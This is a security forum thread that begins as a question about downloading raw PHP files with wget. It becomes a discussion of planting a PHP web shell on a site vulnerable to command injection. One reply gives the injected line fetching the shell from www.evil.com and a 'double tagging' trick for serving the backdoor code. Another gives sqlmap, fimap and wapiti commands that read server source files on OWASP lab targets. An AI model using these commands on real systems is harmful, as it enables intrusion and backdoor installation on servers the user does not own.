Wget download ONLY PHP file

Question

Hi everyone,

 

this is a lame-ass question but I couldn't find an answer easily just googling around.

I want to download a .PHP file from a webserver but the original file, not the file once interpreted by the web browser.

What happens when I just do

wget http://the.webserver.com/file.php

is that the server processes the PHP code and I end up with the result instead of the original code.

Is there even a way to do this?

 

Thanks in advance!

Greg

Answer 1

What about renaming your file to foo.txt

a.b.c.d; wget http://server/foo.txt; mv foo.txt foo.php

 

In this case, your webserver does not interpret the php code inside the file.

Otherwise, it is possible to change your server configuration for not interpreting php but I'm not sure it is possible for one file only.

Comments

Nice! Easy and effective :)

Thanks!

Greg

Answer 2

Hi,

You can't download the source code except by having a direct access to the server. The code is directly interpreted by the web browser.

If there is bad input validation on file inclusion, you can do local file inclusion and then discover the source code.

Nib

Answer 3

Thanks for your answers, a lame question indeed.

The situation I had in mind is as follows:

1. I found a website vulnerable to command execution.

2. I have a webserver (www.evil.com) under my control, where I host a PHP shell (sbd.php)

3. I wanted to send this file to the victim doing something like

      a.b.c.d; wget http://www.evil.com/sbd.php

    (supposed that the web server has wget installed, of course :P)

4. Be able to call the PHP shell, now under the webserver tree of the victim.

 

But I guess there's no way to circumvent the HTTP protocol, even with total control of the "attacking" webserver. Bummer!

Answer 4

Hi Greg ;)

I guess in that case you could use a "double tagging" trick.

(Have you guys realised how many security problems are "double tagging stuff"? ;) )

Following your example, your sbd.php file should be of the form:

<!-- begin double tagging --> <?php

print("<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->\n
<?php\n

     your_evil_php_code();\n

     [...] ");  <-- end of the print function

?>\n

?> <!-- end double tagging>

You would have to escape a lot of shit due to the print function ($, ", etc) but it works.

And it has the nice side effect that you don't have a functional php shell on your server waiting to be pwned! XD

 

Hope this helps!

Answer 5

Yes, Nibbler is right. You can't do anything not specified in the HTTP protocol. When you use Wget behind the stages there's nothing else than GET, HEAD, PUT, etc. requests.

Fetching a file with wget is just a GET request, this will be processed by the web server like any other coming from a web browser.

 

Carlos

Answer 6

The easiest way to grab a PHP file if you do not already have access to the web server is to either brute-force SSH/etc access (depending on open ports available on that server) or to find a file read inclusion vulnerability, PHP eval vulnerability, or a SQL injection vulnerability that allows for, say, a MySQL load file operation.

Shortcuts:

./fimap.py -v 3 -u "http://owaspbwa/mutillidae/index.php?page=index.php" -b -x

./wapiti.py http://owaspbwa/peruggia/ -v 2 -b folder -f txt -o p2.txt -m "-all,blindsql,sql"

./sqlmap.py -v 6 --delay=0 --predict-output --keep-alive --null-connection --dbms=MySQL -u "http://owaspbwa/peruggia/index.php?action=comment&pic_id=1" -p pic_id --level 5 --risk 3 --sql-query="load_file('/var/www/peruggia/index.php')"

./sqlmap.py -v 6 --delay=0 --predict-output --keep-alive --dbms=MySQL -u "http://owaspbwa/peruggia/index.php?action=login&check=1" --data "username=a" -p username --level 5 --risk 3 --sql-query="load_file('/var/www/peruggia/index.php')"